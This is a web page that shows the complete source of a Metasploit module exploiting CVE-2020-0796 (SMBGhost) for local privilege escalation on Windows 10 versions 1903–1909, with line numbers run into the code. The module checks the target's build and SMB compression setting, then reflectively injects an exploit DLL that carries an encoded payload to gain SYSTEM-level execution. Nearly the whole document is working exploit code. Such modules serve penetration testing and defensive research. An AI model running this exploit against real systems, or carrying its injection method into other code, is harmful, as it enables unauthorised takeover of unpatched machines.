Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/exploits/windows/local/cve_2020_0796_smbghost.rb
Views: 11655
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Local6Rank = GoodRanking78include Msf::Post::File9include Msf::Post::Windows::Priv10include Msf::Post::Windows::Process11include Msf::Post::Windows::ReflectiveDLLInjection12prepend Msf::Exploit::Remote::AutoCheck1314def initialize(info = {})15super(16update_info(17info,18{19'Name' => 'SMBv3 Compression Buffer Overflow',20'Description' => %q{21A vulnerability exists within the Microsoft Server Message Block 3.1.1 (SMBv3) protocol that can be leveraged to22execute code on a vulnerable server. This local exploit implementation leverages this flaw to elevate itself23before injecting a payload into winlogon.exe.24},25'License' => MSF_LICENSE,26'Author' => [27'Daniel García Gutiérrez', # original LPE exploit28'Manuel Blanco Parajón', # original LPE exploit29'Spencer McIntyre' # metasploit module30],31'Arch' => [ ARCH_X86, ARCH_X64 ],32'Platform' => 'win',33'SessionTypes' => [ 'meterpreter' ],34'DefaultOptions' => {35'EXITFUNC' => 'thread'36},37'Targets' => [38# [ 'Windows 10 x86', { 'Arch' => ARCH_X86 } ],39[ 'Windows 10 v1903-1909 x64', { 'Arch' => ARCH_X64 } ]40],41'Payload' => {42'DisableNops' => true43},44'References' => [45[ 'CVE', '2020-0796' ],46[ 'URL', 'https://github.com/danigargu/CVE-2020-0796' ],47[ 'URL', 'https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/adv200005' ]48],49'DisclosureDate' => '2020-03-13',50'DefaultTarget' => 0,51'Notes' => {52'AKA' => [ 'SMBGhost', 'CoronaBlue' ],53'Stability' => [ CRASH_OS_RESTARTS, ],54'SideEffects' => [ IOC_IN_LOGS ],55'Reliability' => [ REPEATABLE_SESSION, ],56'RelatedModules' => [ 'exploit/windows/smb/cve_2020_0796_smbghost' ]57}58}59)60)61end6263def check64if session.platform != 'windows'65# Non-Windows systems are definitely not affected.66return Exploit::CheckCode::Safe67end6869version = get_version_info70vprint_status("Windows Build Number = #{version.build_number}")71# see https://docs.microsoft.com/en-us/windows/release-information/72unless version.build_number.between?(Msf::WindowsVersion::Win10_1903, Msf::WindowsVersion::Win10_1909)73print_error('The exploit only supports Windows 10 versions 1903 - 1909')74return CheckCode::Safe75end7677disable_compression = registry_getvaldata('HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters', 'DisableCompression')78if !disable_compression.nil? && disable_compression != 079print_error('The exploit requires compression to be enabled')80return CheckCode::Safe81end8283CheckCode::Appears84end8586def exploit87if is_system?88fail_with(Failure::None, 'Session is already elevated')89end9091if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X8692fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')93elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X8694fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')95elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X6496fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')97end9899print_status('Reflectively injecting the exploit DLL and executing it...')100101# invoke the exploit, passing in the address of the payload that102# we want invoked on successful exploitation.103encoded_payload = payload.encoded104execute_dll(105::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0796', 'CVE-2020-0796.x64.dll'),106[encoded_payload.length].pack('I<') + encoded_payload107)108109print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')110end111end112113114